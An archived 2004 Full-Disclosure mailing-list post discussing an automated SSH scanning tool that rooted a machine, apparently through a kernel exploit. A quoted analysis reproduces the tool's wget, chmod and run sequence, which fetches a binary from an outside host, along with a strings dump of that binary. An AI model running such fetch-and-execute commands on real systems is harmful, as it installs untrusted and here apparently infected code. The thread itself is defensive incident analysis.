[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <05e701c48bd4$42320b00$5746370a@nsp.co.nz>
From: venom at gen-x.co.nz (VeNoMouS)
Subject: Betr.: RE: Automated ssh scanning
LOL that file is infected with rst.b and you ran it?? hope it was inside a
chroot() other wise time to replace every elf binary >:)
----- Original Message -----
From: "Blue Boar" <BlueBoar@...evco.com>
To: "Todd Towles" <toddtowles@...okshires.com>
Cc: "Pascal Zoutendijk" <Pascal.Zoutendijk@...a.nl>; "Mailing List -
Full-Disclosure" <full-disclosure@...ts.netsys.com>
Sent: Friday, August 27, 2004 9:12 AM
Subject: Re: Betr.: RE: [Full-Disclosure] Automated ssh scanning
> Todd Towles wrote:
>
>> It could be, but he said it was patched. I didn't run the test of
>> course. I never said it was the kernel however, it could be a service
>> running.
>> And unknown does not equal zero-day. But the tool got root and he
>> doesn't know how. That is the point. Kernel, old service, whatever. It
>> would be nice to find it.
>
> If you take a look at this bit:
>
> wget www.bo2k-rulez.net/a
> chmod +x a
> ./a
>
> The file "a" gives every superficial indication that it's a kernel
> exploit, if you want to go by a 20-second Notepad analysis:
>
> [-] Unable to exit, entering neverending loop.
> Kernel seems not to be vulnerable double allocation
> Unable to determine kernel address Unable to set up LDT Unable
> to change page protection Invalid LDT entry Unable to jump to call gate
> /bin/sh Unable to spawn shell
> PATH=/usr/bin:/bin:/usr/sbin:/sbin Unable to allocate
> memory Unable to unmap stack Unable to expand BSS
> /proc/sys/kernel/osrelease FATAL: kernel too old
> FATAL: cannot determine library version
> /dev/null ;?..;?..(?..??..??.. malloc: using
> debugging hooks
> realloc(): invalid pointer %p!
> malloc: top chunk is corrupt
> Arena %d:
> system bytes = %10u
> in use bytes = %10u
> Total (incl. mmap):
> max mmap regions = %10u
> max mmap bytes = %10lu
> free(): invalid pointer %p!
> TOP_PAD_ MMAP_MAX_ TRIM_THRESHOLD_ MMAP_THRESHOLD_
>
> BB
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
Powered by blists - more mailing lists